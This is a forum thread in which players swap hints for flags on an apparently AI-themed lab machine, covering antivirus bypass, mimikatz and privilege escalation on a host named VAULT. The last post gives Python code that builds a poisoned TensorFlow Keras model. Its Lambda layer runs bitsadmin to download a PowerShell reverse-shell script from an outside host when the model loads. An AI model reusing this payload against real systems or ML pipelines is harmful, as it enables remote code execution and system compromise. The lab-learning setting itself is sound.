Possibly Related Threads…

Humidity12Percent · Sep 17, 2024, 07:39 PM

(Sep 17, 2024, 04:20 PM)4rrows Wrote:
(Sep 17, 2024, 02:11 PM)dmitry7750 Wrote:
(Sep 16, 2024, 10:26 PM)Humidity12Percent Wrote: Anyone got some hints for 4th flag? Is Tensorflow the way to go? The one RCE I found doesn't seem to work.

Apparently we need to write a vulnerable class for Tensorflow. But I haven't managed to do it yet.
Did you find an RCE on this machine?

How did you get the 2nd and 3rd flags? I'm stuck here, need help to move on

Did you already find CCTV and Vault servers?
Hint for CCTV: Look closely
Hint for Vault: Remember, this is an AI heavy machine. Maybe you'll have to fake something.

I0ann · Sep 24, 2024, 11:48 AM

How did you get the 2nd and 3rd flags? I'm stuck here, need help to move on ! HELP ME Big Grin

weakdaw22 · Oct 04, 2024, 02:32 PM

anyone help me to get 3rd flag and 4th flag?

MrBlue · Oct 05, 2024, 10:09 AM

guyd, do u have idea for bypassing av on vault? run for 5th flag

Togepi · Oct 06, 2024, 08:56 PM

any hints for FULLHOUSE-VAULT? got a shell, only got 1 creds using mimikatz, but that's it.. not sure how to move on.. this box is btw absolute garbage, it slow as f and nothing works.

braun33 · Oct 09, 2024, 10:05 AM

I'm stuck on the 5th flag too. I have a shell on VAULT but I can't get through. I tried priv esc but I didn't find anything yet. Does anyone have a suggestion?

MrBlue · Oct 09, 2024, 12:57 PM

bypass AV, then u'll be able to abuse your current permissions to escalate

braun33 · Oct 11, 2024, 11:42 AM

does that cobol file have anything to do with it or is it just a waste of time?

4rrows · Oct 11, 2024, 02:08 PM

(Oct 09, 2024, 10:05 AM)braun33 Wrote: I'm stuck on the 5th flag too. I have a shell on VAULT but I can't get through. I tried priv esc but I didn't find anything yet. Does anyone have a suggestion?

How did you find the 4th flag, any hint?
I have been trying to exploit the TensorFlow but nothing works, how did you do it?

braun33 · Oct 11, 2024, 02:23 PM

(Oct 11, 2024, 02:08 PM)4rrows Wrote:
(Oct 09, 2024, 10:05 AM)braun33 Wrote: I'm stuck on the 5th flag too. I have a shell on VAULT but I can't get through. I tried priv esc but I didn't find anything yet. Does anyone have a suggestion?

How did you find the 4th flag, any hint?
I have been trying to exploit the TensorFlow but nothing works, how did you do it?

you must use python3.11 otherwise it doesn't work.

import tensorflow as tf

def exploit(x):

    import os

    # Scarica il file PowerShell

    os.system('bitsadmin /transfer myDownloadJob /download /priority normal http://ip/rev.ps1 C:\\Users\\Public\\shell.ps1')

    return x

model = tf.keras.Sequential()

model.add(tf.keras.layers.Input(shape=(64,)))

model.add(tf.keras.layers.Lambda(exploit))

model.compile()

model.save("infected_download.h5")

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] HackTheBox Dante - complete writeup written by Tamarisk	Tamarisk	602	91,920	Yesterday, 06:48 PM Last Post: sabero_exe
	[FREE] CPTS 12 FLAGS	pulsebreaker	68	1,975	Yesterday, 09:54 AM Last Post: VictorPipeau
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	371	93,038	Yesterday, 08:48 AM Last Post: phannguyenbaouy1
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	21	2,631	Yesterday, 05:08 AM Last Post: popoler
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,278	Apr 30, 2026, 02:10 PM Last Post: kkkato